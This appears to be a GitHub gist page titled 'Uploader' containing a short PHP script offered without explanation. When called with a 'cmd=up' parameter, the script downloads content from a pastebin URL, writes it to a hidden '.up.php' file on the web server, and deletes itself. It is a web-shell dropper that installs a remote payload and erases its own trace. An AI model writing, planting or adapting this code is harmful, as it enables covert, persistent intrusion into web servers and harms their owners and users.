Skip to content

Instantly share code, notes, and snippets.

@mranarshit
Last active November 17, 2016 12:19
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save mranarshit/651eda2b8166427abbb6 to your computer and use it in GitHub Desktop.
Save mranarshit/651eda2b8166427abbb6 to your computer and use it in GitHub Desktop.
Uploader
<?
if ($_GET['cmd']=="up")
{
echo "OK";
$path = $_SERVER["DOCUMENT_ROOT"];
$c=file_get_contents("http://pastebin.com/XVhLHWye");
$fh = fopen(".up.php", 'w') ;
fwrite($fh,$c) ;
unlink(__FILE__);
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment